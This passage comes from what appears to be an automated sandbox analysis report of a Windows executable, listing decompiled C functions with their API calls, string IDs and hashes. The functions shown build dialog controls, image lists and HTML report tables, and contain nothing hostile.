                                                                                                                					SendMessageW( *(_t62 + 0x2a0), 0x1003, 0,  *(_t62 + 0x2ac));
                                                                                                                				}
                                                                                                                				 *(_t62 + 0x2a4) =  *_t64(0x10, 0x10, 0x19, 1, 1);
                                                                                                                				_v1248 = LoadImageW(GetModuleHandleW(0), 0x85, 0, 0x10, 0x10, 0x1000);
                                                                                                                				_t37 = LoadImageW(GetModuleHandleW(0), 0x86, 0, 0x10, 0x10, 0x1000);
                                                                                                                				_v1244 = _t37;
                                                                                                                				__imp__ImageList_SetImageCount( *(_t62 + 0x2a4), 0);
                                                                                                                				_t38 = GetSysColor(0xf);
                                                                                                                				_v1248 = _t38;
                                                                                                                				ImageList_AddMasked( *(_t62 + 0x2a4), _v1256, _t38);
                                                                                                                				ImageList_AddMasked( *(_t62 + 0x2a4), _v1252, _v1248);
                                                                                                                				DeleteObject(_v1268);
                                                                                                                				DeleteObject(_v1268);
                                                                                                                				return SendMessageW(E0040331D( *(_t62 + 0x2a0)), 0x1208, 0,  *(_t62 + 0x2a4));
                                                                                                                			}

                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 00407FD0
                                                                                                                • memset.MSVCRT ref: 00407FE5
                                                                                                                • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00407FF7
                                                                                                                • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 00408015
                                                                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 0040802E
                                                                                                                • ImageList_SetImageCount.COMCTL32(00000000,00000000), ref: 00408038
                                                                                                                • SendMessageW.USER32(?,00001003,00000001,?), ref: 00408051
                                                                                                                • ImageList_Create.COMCTL32(00000020,00000020,00000019,00000001,00000001), ref: 00408065
                                                                                                                • ImageList_SetImageCount.COMCTL32(00000000,00000000), ref: 0040806F
                                                                                                                • SendMessageW.USER32(?,00001003,00000000,?), ref: 00408087
                                                                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 00408093
                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 004080A2
                                                                                                                • LoadImageW.USER32 ref: 004080B4
                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 004080BF
                                                                                                                • LoadImageW.USER32 ref: 004080D1
                                                                                                                • ImageList_SetImageCount.COMCTL32(?,00000000), ref: 004080E2
                                                                                                                • GetSysColor.USER32(0000000F), ref: 004080EA
                                                                                                                • ImageList_AddMasked.COMCTL32(?,00000000,00000000), ref: 00408105
                                                                                                                • ImageList_AddMasked.COMCTL32(?,?,?), ref: 00408115
                                                                                                                • DeleteObject.GDI32(?), ref: 00408121
                                                                                                                • DeleteObject.GDI32(?), ref: 00408127
                                                                                                                • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 00408144
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: Image$List_$CountCreateMessageSend$DeleteHandleLoadMaskedModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                                                                                • String ID:
                                                                                                                • API String ID: 304928396-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 69%
                                                                                                                			E0040AE90(void* __esi, wchar_t* _a4, wchar_t* _a8) {
                                                                                                                				int _v8;
                                                                                                                				void _v518;
                                                                                                                				long _v520;
                                                                                                                				void _v1030;
                                                                                                                				char _v1032;
                                                                                                                				intOrPtr _t32;
                                                                                                                				wchar_t* _t57;
                                                                                                                				void* _t58;
                                                                                                                				void* _t59;
                                                                                                                				void* _t60;
                                                                                                                
                                                                                                                				_t58 = __esi;
                                                                                                                				_v520 = 0;
                                                                                                                				memset( &_v518, 0, 0x1fc);
                                                                                                                				_v1032 = 0;
                                                                                                                				memset( &_v1030, 0, 0x1fc);
                                                                                                                				_t60 = _t59 + 0x18;
                                                                                                                				_v8 = 1;
                                                                                                                				if( *((intOrPtr*)(__esi + 4)) == 0xffffffff &&  *((intOrPtr*)(__esi + 8)) <= 0) {
                                                                                                                					_v8 = 0;
                                                                                                                				}
                                                                                                                				_t57 = _a4;
                                                                                                                				 *_t57 = 0;
                                                                                                                				if(_v8 != 0) {
                                                                                                                					wcscpy(_t57, L"<font");
                                                                                                                					_t32 =  *((intOrPtr*)(_t58 + 8));
                                                                                                                					if(_t32 > 0) {
                                                                                                                						_push(_t32);
                                                                                                                						_push(L" size=\"%d\"");
                                                                                                                						_push(0xff);
                                                                                                                						_push( &_v520);
                                                                                                                						L0040B1EC();
                                                                                                                						wcscat(_t57,  &_v520);
                                                                                                                						_t60 = _t60 + 0x18;
                                                                                                                					}
                                                                                                                					_t33 =  *((intOrPtr*)(_t58 + 4));
                                                                                                                					if( *((intOrPtr*)(_t58 + 4)) != 0xffffffff) {
                                                                                                                						_push(E0040ADC0(_t33,  &_v1032));
                                                                                                                						_push(L" color=\"#%s\"");
                                                                                                                						_push(0xff);
                                                                                                                						_push( &_v520);
                                                                                                                						L0040B1EC();
                                                                                                                						wcscat(_t57,  &_v520);
                                                                                                                					}
                                                                                                                					wcscat(_t57, ">");
                                                                                                                				}
                                                                                                                				if( *((intOrPtr*)(_t58 + 0xc)) != 0) {
                                                                                                                					wcscat(_t57, L"<b>");
                                                                                                                				}
                                                                                                                				wcscat(_t57, _a8);
                                                                                                                				if( *((intOrPtr*)(_t58 + 0xc)) != 0) {
                                                                                                                					wcscat(_t57, L"</b>");
                                                                                                                				}
                                                                                                                				if(_v8 != 0) {
                                                                                                                					wcscat(_t57, L"</font>");
                                                                                                                				}
                                                                                                                				return _t57;
                                                                                                                			}














                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: wcscat$_snwprintfmemset$wcscpy
                                                                                                                • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                                                • API String ID: 3143752011-1996832678
                                                                                                                • Opcode ID: 330f77f369881cb7aaffb2d4d29cef926f955dd174757b27785871b236def110
                                                                                                                • Instruction ID: 2e7f7f44a8c08f278b605cd2082ab28bfbf3198b566a778c3f72e8233e5ba29a
                                                                                                                • Opcode Fuzzy Hash: 330f77f369881cb7aaffb2d4d29cef926f955dd174757b27785871b236def110
                                                                                                                • Instruction Fuzzy Hash: 2531C6B2904306A9D720EAA59D86E7E73BCDF40714F10807FF214B61C2DB7C9944D69D
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 97%
                                                                                                                			E00403C03(void* __eflags) {
                                                                                                                				void* __ebx;
                                                                                                                				void* __ecx;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				void* _t88;
                                                                                                                				void* _t108;
                                                                                                                				void* _t113;
                                                                                                                				void* _t119;
                                                                                                                				void* _t121;
                                                                                                                				void* _t122;
                                                                                                                				void* _t123;
                                                                                                                				intOrPtr* _t124;
                                                                                                                				void* _t134;
                                                                                                                
                                                                                                                				_t113 = _t108;
                                                                                                                				E00403B3C(_t113);
                                                                                                                				E00403B16(_t113);
                                                                                                                				DragAcceptFiles( *(_t113 + 0x10), 1);
                                                                                                                				 *0x40f2f0 = SetWindowLongW(GetDlgItem( *(_t113 + 0x10), 0x3fd), 0xfffffffc, E00403A73);
                                                                                                                				E00402DDD( *(_t113 + 0x10), _t113 + 0x40);
                                                                                                                				 *(_t124 + 0x14) = LoadImageW(GetModuleHandleW(0), 0x65, 1, 0x10, 0x10, 0);
                                                                                                                				 *((intOrPtr*)(_t124 + 0x24)) = LoadImageW(GetModuleHandleW(0), 0x65, 1, 0x20, 0x20, 0);
                                                                                                                				SendMessageW( *(_t113 + 0x10), 0x80, 0,  *(_t124 + 0x10));
                                                                                                                				SendMessageW( *(_t113 + 0x10), 0x80, 1,  *(_t124 + 0x14));
                                                                                                                				E0040AD85(GetDlgItem( *(_t113 + 0x10), 0x402));
                                                                                                                				 *_t124 = 0x3ea;
                                                                                                                				E0040AD85(GetDlgItem(??, ??));
                                                                                                                				 *_t124 = 0x3f1;
                                                                                                                				_t116 = GetDlgItem( *(_t113 + 0x10),  *(_t113 + 0x10));
                                                                                                                				E004049D9(_t49, E00405B81(0x259), 0x20);
                                                                                                                				E004049D9(_t49, E00405B81(0x25a), 0x40);
                                                                                                                				E004049D9(_t116, E00405B81(0x25b), 0x80);
                                                                                                                				E004049D9(_t116, E00405B81(0x25c), 0x100);
                                                                                                                				E004049D9(_t116, E00405B81(0x25d), 0x4000);
                                                                                                                				E004049D9(_t116, E00405B81(0x25e), 0x8000);
                                                                                                                				_t117 = GetDlgItem( *(_t113 + 0x10), 0x3f5);
                                                                                                                				E004049D9(_t62, E00405B81(0x26c), 0);
                                                                                                                				E004049D9(_t62, E00405B81(0x26d), 1);
                                                                                                                				E004049D9(_t117, E00405B81(0x26e), 2);
                                                                                                                				E004049D9(_t117, E00405B81(0x26f), 3);
                                                                                                                				_t134 = _t124 + 0x78;
                                                                                                                				 *((intOrPtr*)(_t134 + 0x10)) = GetDlgItem( *(_t113 + 0x10), 0x400);
                                                                                                                				_t119 = 1;
                                                                                                                				do {
                                                                                                                					_t17 = _t119 + 0x280; // 0x281
                                                                                                                					E004049D9( *((intOrPtr*)(_t134 + 0x18)), E00405B81(_t17), _t119);
                                                                                                                					_t134 = _t134 + 0xc;
                                                                                                                					_t119 = _t119 + 1;
                                                                                                                				} while (_t119 <= 9);
                                                                                                                				 *((intOrPtr*)(_t134 + 0x10)) = GetDlgItem( *(_t113 + 0x10), 0x3fc);
                                                                                                                				_t121 = 1;
                                                                                                                				do {
                                                                                                                					_t21 = _t121 + 0x294; // 0x295
                                                                                                                					E004049D9( *((intOrPtr*)(_t134 + 0x18)), E00405B81(_t21), _t121);
                                                                                                                					_t134 = _t134 + 0xc;
                                                                                                                					_t121 = _t121 + 1;
                                                                                                                				} while (_t121 <= 3);
                                                                                                                				 *((intOrPtr*)(_t134 + 0x10)) = GetDlgItem( *(_t113 + 0x10), 0x407);
                                                                                                                				_t122 = 0;
                                                                                                                				do {
                                                                                                                					_t25 = _t122 + 0x2bc; // 0x2bc
                                                                                                                					E004049D9( *((intOrPtr*)(_t134 + 0x18)), E00405B81(_t25), _t122);
                                                                                                                					_t134 = _t134 + 0xc;
                                                                                                                					_t122 = _t122 + 1;
                                                                                                                				} while (_t122 <= 0xd);
                                                                                                                				 *((intOrPtr*)(_t134 + 0x10)) = GetDlgItem( *(_t113 + 0x10), 0x40c);
                                                                                                                				_t123 = 0;
                                                                                                                				do {
                                                                                                                					_t29 = _t123 + 0x2ee; // 0x2ee
                                                                                                                					E004049D9( *((intOrPtr*)(_t134 + 0x18)), E00405B81(_t29), _t123);
                                                                                                                					_t134 = _t134 + 0xc;
                                                                                                                					_t123 = _t123 + 1;
                                                                                                                					_t143 = _t123 - 3;
                                                                                                                				} while (_t123 < 3);
                                                                                                                				SendDlgItemMessageW( *(_t113 + 0x10), 0x3fd, 0xc5, 0, 0);
                                                                                                                				E00403EC3(GetDlgItem, _t113);
                                                                                                                				SetFocus(GetDlgItem( *(_t113 + 0x10), 0x402));
                                                                                                                				_t88 = E00402D78(_t113, _t143);
                                                                                                                				E00402BEE(_t113);
                                                                                                                				return _t88;
                                                                                                                			}

















                                                                                                                APIs
                                                                                                                  • Part of subcall function 00403B3C: memset.MSVCRT ref: 00403B5D
                                                                                                                  • Part of subcall function 00403B3C: memset.MSVCRT ref: 00403B76
                                                                                                                  • Part of subcall function 00403B3C: _snwprintf.MSVCRT ref: 00403B9F
                                                                                                                  • Part of subcall function 00403B16: SetDlgItemTextW.USER32 ref: 00403B34
                                                                                                                • DragAcceptFiles.SHELL32(?,00000001), ref: 00403C1B
                                                                                                                • GetDlgItem.USER32 ref: 00403C2F
                                                                                                                • SetWindowLongW.USER32 ref: 00403C39
                                                                                                                  • Part of subcall function 00402DDD: GetClientRect.USER32 ref: 00402DEF
                                                                                                                  • Part of subcall function 00402DDD: GetWindow.USER32(?,00000005), ref: 00402E07
                                                                                                                  • Part of subcall function 00402DDD: GetWindow.USER32(00000000), ref: 00402E0A
                                                                                                                  • Part of subcall function 00402DDD: GetWindow.USER32(00000000,00000002), ref: 00402E16
                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00403C57
                                                                                                                • LoadImageW.USER32 ref: 00403C6A
                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00403C72
                                                                                                                • LoadImageW.USER32 ref: 00403C7F
                                                                                                                • SendMessageW.USER32(?,00000080,00000000,?), ref: 00403C9A
                                                                                                                • SendMessageW.USER32(?,00000080,00000001,?), ref: 00403CA6
                                                                                                                • GetDlgItem.USER32 ref: 00403CB0
                                                                                                                  • Part of subcall function 0040AD85: GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 0040AD9D
                                                                                                                  • Part of subcall function 0040AD85: FreeLibrary.KERNEL32(00000000,?,00403CB8,00000000), ref: 0040ADB5
                                                                                                                • GetDlgItem.USER32 ref: 00403CC2
                                                                                                                • GetDlgItem.USER32 ref: 00403CD4
                                                                                                                  • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,00403490), ref: 00405BC0
                                                                                                                  • Part of subcall function 00405B81: LoadStringW.USER32(00000000,000001F5,?), ref: 00405C59
                                                                                                                  • Part of subcall function 00405B81: memcpy.MSVCRT ref: 00405C99
                                                                                                                  • Part of subcall function 004049D9: SendMessageW.USER32(?,00000143,00000000,?), ref: 004049F0
                                                                                                                  • Part of subcall function 004049D9: SendMessageW.USER32(?,00000151,00000000,?), ref: 00404A02
                                                                                                                  • Part of subcall function 00405B81: wcscpy.MSVCRT ref: 00405C02
                                                                                                                  • Part of subcall function 00405B81: wcslen.MSVCRT ref: 00405C20
                                                                                                                  • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,?,00403490), ref: 00405C2E
                                                                                                                • GetDlgItem.USER32 ref: 00403D64
                                                                                                                • GetDlgItem.USER32 ref: 00403DC0
                                                                                                                • GetDlgItem.USER32 ref: 00403DF0
                                                                                                                • GetDlgItem.USER32 ref: 00403E20
                                                                                                                • GetDlgItem.USER32 ref: 00403E4F
                                                                                                                • SendDlgItemMessageW.USER32 ref: 00403E87
                                                                                                                • GetDlgItem.USER32 ref: 00403E9B
                                                                                                                • SetFocus.USER32(00000000), ref: 00403E9E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: Item$MessageSend$HandleModuleWindow$Load$Imagememset$AcceptAddressClientDragFilesFocusFreeLibraryLongProcRectStringText_snwprintfmemcpywcscpywcslen
                                                                                                                • String ID:
                                                                                                                • API String ID: 1038210931-0
                                                                                                                • Opcode ID: 480d4766e6d8641b1262395da53219e72a248241b0e6c98f945c6f60a0780f3c
                                                                                                                • Instruction ID: 1ad7597cb923a57af30b7376ae6fce15a7391ca9e5b6ac25faa2013acf12c195
                                                                                                                • Opcode Fuzzy Hash: 480d4766e6d8641b1262395da53219e72a248241b0e6c98f945c6f60a0780f3c
                                                                                                                • Instruction Fuzzy Hash: D261A6B09407087FE6207F71DC47F2B7A6CEF40714F000A3ABB46751D3DABA69158A59
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 56%
                                                                                                                			E00407763(intOrPtr* __ebx, intOrPtr _a4, intOrPtr* _a8) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				intOrPtr _v16;
                                                                                                                				intOrPtr _v20;
                                                                                                                				signed int _v24;
                                                                                                                				signed int _v28;
                                                                                                                				signed int _v32;
                                                                                                                				void _v138;
                                                                                                                				long _v140;
                                                                                                                				void _v242;
                                                                                                                				char _v244;
                                                                                                                				void _v346;
                                                                                                                				char _v348;
                                                                                                                				void _v452;
                                                                                                                				void _v962;
                                                                                                                				signed short _v964;
                                                                                                                				void* __esi;
                                                                                                                				void* _t87;
                                                                                                                				wchar_t* _t109;
                                                                                                                				intOrPtr* _t124;
                                                                                                                				signed int _t125;
                                                                                                                				signed int _t140;
                                                                                                                				signed int _t153;
                                                                                                                				intOrPtr* _t154;
                                                                                                                				signed int _t156;
                                                                                                                				signed int _t157;
                                                                                                                				void* _t159;
                                                                                                                				void* _t161;
                                                                                                                
                                                                                                                				_t124 = __ebx;
                                                                                                                				_v964 = _v964 & 0x00000000;
                                                                                                                				memset( &_v962, 0, 0x1fc);
                                                                                                                				_t125 = 0x18;
                                                                                                                				memcpy( &_v452, L"<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s\r\n", _t125 << 2);
                                                                                                                				asm("movsw");
                                                                                                                				_t153 = 0;
                                                                                                                				_v244 = 0;
                                                                                                                				memset( &_v242, 0, 0x62);
                                                                                                                				_v348 = 0;
                                                                                                                				memset( &_v346, 0, 0x62);
                                                                                                                				_v140 = 0;
                                                                                                                				memset( &_v138, 0, 0x62);
                                                                                                                				_t161 = _t159 + 0x3c;
                                                                                                                				_t87 =  *((intOrPtr*)( *__ebx + 0x14))();
                                                                                                                				_v16 =  *((intOrPtr*)(__ebx + 0x2d4));
                                                                                                                				if(_t87 != 0xffffffff) {
                                                                                                                					_push(E0040ADC0(_t87,  &_v964));
                                                                                                                					_push(L" bgcolor=\"%s\"");
                                                                                                                					_push(0x32);
                                                                                                                					_push( &_v244);
                                                                                                                					L0040B1EC();
                                                                                                                					_t161 = _t161 + 0x18;
                                                                                                                				}
                                                                                                                				E00407343(_t124, _a4, L"<table border=\"1\" cellpadding=\"5\">\r\n");
                                                                                                                				_v8 = _t153;
                                                                                                                				if( *((intOrPtr*)(_t124 + 0x2c)) > _t153) {
                                                                                                                					while(1) {
                                                                                                                						_t156 =  *( *((intOrPtr*)(_t124 + 0x30)) + _v8 * 4);
                                                                                                                						_v12 = _t156;
                                                                                                                						_t157 = _t156 * 0x14;
                                                                                                                						if( *((intOrPtr*)(_t157 +  *((intOrPtr*)(_t124 + 0x40)) + 8)) != _t153) {
                                                                                                                							wcscpy( &_v140, L" nowrap");
                                                                                                                						}
                                                                                                                						_v32 = _v32 | 0xffffffff;
                                                                                                                						_v28 = _v28 | 0xffffffff;
                                                                                                                						_v24 = _v24 | 0xffffffff;
                                                                                                                						_v20 = _t153;
                                                                                                                						_t154 = _a8;
                                                                                                                						 *((intOrPtr*)( *_t124 + 0x34))(6, _v8, _t154,  &_v32);
                                                                                                                						E0040ADC0(_v32,  &_v348);
                                                                                                                						E0040ADF1( *((intOrPtr*)( *_t154))(_v12,  *((intOrPtr*)(_t124 + 0x60))),  *(_t124 + 0x64));
                                                                                                                						 *((intOrPtr*)( *_t124 + 0x50))( *(_t124 + 0x64), _t154, _v12);
                                                                                                                						if( *((intOrPtr*)( *_t124 + 0x18))() == 0xffffffff) {
                                                                                                                							wcscpy( *(_t124 + 0x68),  *(_t157 + _v16 + 0x10));
                                                                                                                						} else {
                                                                                                                							_push( *(_t157 + _v16 + 0x10));
                                                                                                                							_push(E0040ADC0(_t106,  &_v964));
                                                                                                                							_push(L"<font color=\"%s\">%s</font>");
                                                                                                                							_push(0x2000);
                                                                                                                							_push( *(_t124 + 0x68));
                                                                                                                							L0040B1EC();
                                                                                                                							_t161 = _t161 + 0x14;
                                                                                                                						}
                                                                                                                						_t109 =  *(_t124 + 0x64);
                                                                                                                						_t140 =  *_t109 & 0x0000ffff;
                                                                                                                						if(_t140 == 0 || _t140 == 0x20) {
                                                                                                                							wcscat(_t109, L"&nbsp;");
                                                                                                                						}
                                                                                                                						E0040AE90( &_v32,  *((intOrPtr*)(_t124 + 0x6c)),  *(_t124 + 0x64));
                                                                                                                						_push( *((intOrPtr*)(_t124 + 0x6c)));
                                                                                                                						_push( &_v140);
                                                                                                                						_push( &_v348);
                                                                                                                						_push( *(_t124 + 0x68));
                                                                                                                						_push( &_v244);
                                                                                                                						_push( &_v452);
                                                                                                                						_push(0x2000);
                                                                                                                						_push( *((intOrPtr*)(_t124 + 0x60)));
                                                                                                                						L0040B1EC();
                                                                                                                						_t161 = _t161 + 0x28;
                                                                                                                						E00407343(_t124, _a4,  *((intOrPtr*)(_t124 + 0x60)));
                                                                                                                						_v8 = _v8 + 1;
                                                                                                                						if(_v8 >=  *((intOrPtr*)(_t124 + 0x2c))) {
                                                                                                                							goto L14;
                                                                                                                						}
                                                                                                                						_t153 = 0;
                                                                                                                					}
                                                                                                                				}
                                                                                                                				L14:
                                                                                                                				E00407343(_t124, _a4, L"</table><p>");
                                                                                                                				return E00407343(_t124, _a4, L"\r\n");
                                                                                                                			}
                                                                                                                0x0040792d
                                                                                                                0x00407932
                                                                                                                0x0040793b
                                                                                                                0x00407942
                                                                                                                0x00407943
                                                                                                                0x0040794c
                                                                                                                0x00407953
                                                                                                                0x00407954
                                                                                                                0x00407959
                                                                                                                0x0040795c
                                                                                                                0x00407961
                                                                                                                0x0040796c
                                                                                                                0x00407971
                                                                                                                0x0040797a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00407838
                                                                                                                0x00407838
                                                                                                                0x0040783a
                                                                                                                0x00407980
                                                                                                                0x0040798a
                                                                                                                0x004079a1

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: _snwprintfmemset$wcscpy$wcscat
                                                                                                                • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                                                • API String ID: 1607361635-601624466
                                                                                                                • Opcode ID: 79dd95c05abc82e9b2e709e2cd57865f98d2b899bba57f456d4bed9a2e0af9fd
                                                                                                                • Instruction ID: c59e53cc54c64df10e6b193e6b6ea7c08fa255db16bc08a9aa92b01e8cbfba7b
                                                                                                                • Opcode Fuzzy Hash: 79dd95c05abc82e9b2e709e2cd57865f98d2b899bba57f456d4bed9a2e0af9fd
                                                                                                                • Instruction Fuzzy Hash: C8618E31940208EFDF14AF95CC85EAE7B79FF44310F1041AAF905BA2D2DB34AA54DB99
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 40%
                                                                                                                			E00407B5D(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, char _a16, char _a20, intOrPtr _a24) {
                                                                                                                				void _v514;
                                                                                                                				char _v516;
                                                                                                                				void _v1026;
                                                                                                                				long _v1028;
                                                                                                                				void _v1538;
                                                                                                                				char _v1540;
                                                                                                                				void _v2050;
                                                                                                                				char _v2052;
                                                                                                                				char _v2564;
                                                                                                                				char _v35332;
                                                                                                                				char _t51;
                                                                                                                				intOrPtr* _t54;
                                                                                                                				void* _t61;
                                                                                                                				intOrPtr* _t73;
                                                                                                                				void* _t78;
                                                                                                                				void* _t79;
                                                                                                                				void* _t80;
                                                                                                                				void* _t81;
                                                                                                                
                                                                                                                				E0040B550(0x8a00, __ecx);
                                                                                                                				_v2052 = 0;
                                                                                                                				memset( &_v2050, 0, 0x1fc);
                                                                                                                				_v1540 = 0;
                                                                                                                				memset( &_v1538, 0, 0x1fc);
                                                                                                                				_v1028 = 0;
                                                                                                                				memset( &_v1026, 0, 0x1fc);
                                                                                                                				_t79 = _t78 + 0x24;
                                                                                                                				if(_a20 != 0xffffffff) {
                                                                                                                					_push(E0040ADC0(_a20,  &_v2564));
                                                                                                                					_push(L" bgcolor=\"%s\"");
                                                                                                                					_push(0xff);
                                                                                                                					_push( &_v2052);
                                                                                                                					L0040B1EC();
                                                                                                                					_t79 = _t79 + 0x18;
                                                                                                                				}
                                                                                                                				if(_a24 != 0xffffffff) {
                                                                                                                					_push(E0040ADC0(_a24,  &_v2564));
                                                                                                                					_push(L"<font color=\"%s\">");
                                                                                                                					_push(0xff);
                                                                                                                					_push( &_v1540);
                                                                                                                					L0040B1EC();
                                                                                                                					wcscpy( &_v1028, L"</font>");
                                                                                                                					_t79 = _t79 + 0x20;
                                                                                                                				}
                                                                                                                				_push( &_v2052);
                                                                                                                				_push(L"<table border=\"1\" cellpadding=\"5\"><tr%s>\r\n");
                                                                                                                				_push(0x3fff);
                                                                                                                				_push( &_v35332);
                                                                                                                				L0040B1EC();
                                                                                                                				_t80 = _t79 + 0x10;
                                                                                                                				E00407343(_a4, _a8,  &_v35332);
                                                                                                                				_t51 = _a16;
                                                                                                                				if(_t51 > 0) {
                                                                                                                					_t73 = _a12 + 4;
                                                                                                                					_a20 = _t51;
                                                                                                                					do {
                                                                                                                						_v516 = 0;
                                                                                                                						memset( &_v514, 0, 0x1fc);
                                                                                                                						_t54 =  *_t73;
                                                                                                                						_t81 = _t80 + 0xc;
                                                                                                                						if( *_t54 == 0) {
                                                                                                                							_v516 = 0;
                                                                                                                						} else {
                                                                                                                							_push(_t54);
                                                                                                                							_push(L" width=\"%s\"");
                                                                                                                							_push(0xff);
                                                                                                                							_push( &_v516);
                                                                                                                							L0040B1EC();
                                                                                                                							_t81 = _t81 + 0x10;
                                                                                                                						}
                                                                                                                						_push( &_v1028);
                                                                                                                						_push( *((intOrPtr*)(_t73 - 4)));
                                                                                                                						_push( &_v1540);
                                                                                                                						_push( &_v516);
                                                                                                                						_push(L"<th%s>%s%s%s\r\n");
                                                                                                                						_push(0x3fff);
                                                                                                                						_push( &_v35332);
                                                                                                                						L0040B1EC();
                                                                                                                						_t80 = _t81 + 0x1c;
                                                                                                                						_t61 = E00407343(_a4, _a8,  &_v35332);
                                                                                                                						_t73 = _t73 + 8;
                                                                                                                						_t36 =  &_a20;
                                                                                                                						 *_t36 = _a20 - 1;
                                                                                                                					} while ( *_t36 != 0);
                                                                                                                					return _t61;
                                                                                                                				}
                                                                                                                				return _t51;
                                                                                                                			}






















                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: _snwprintf$memset$wcscpy
                                                                                                                • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                                • API String ID: 2000436516-3842416460
                                                                                                                • Opcode ID: d00ccfce514861463375abe2e6db6ffc98356b9832555c3fb27b3b8e17e2f823
                                                                                                                • Instruction ID: 17ce3237ebe69143205905a5a122d9f10e08837d2ebaecd13bb40ff2a02a5a8b
                                                                                                                • Opcode Fuzzy Hash: d00ccfce514861463375abe2e6db6ffc98356b9832555c3fb27b3b8e17e2f823
                                                                                                                • Instruction Fuzzy Hash: EA413371D40219AAEB20EB55CC86FAB737CFF45304F0440BAB918B6191D774AB948FA9
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 51%
                                                                                                                			E00404415(void* __ecx, void* __eflags, intOrPtr _a4) {
                                                                                                                				void* _v8;
                                                                                                                				void* _v12;
                                                                                                                				void* _v24;
                                                                                                                				intOrPtr _v28;
                                                                                                                				short _v32;
                                                                                                                				void _v2078;
                                                                                                                				signed int _v2080;
                                                                                                                				void _v4126;
                                                                                                                				char _v4128;
                                                                                                                				void _v6174;
                                                                                                                				char _v6176;
                                                                                                                				void _v8222;
                                                                                                                				char _v8224;
                                                                                                                				signed int _t49;
                                                                                                                				short _t55;
                                                                                                                				intOrPtr _t56;
                                                                                                                				int _t73;
                                                                                                                				intOrPtr _t78;
                                                                                                                
                                                                                                                				_t76 = __ecx;
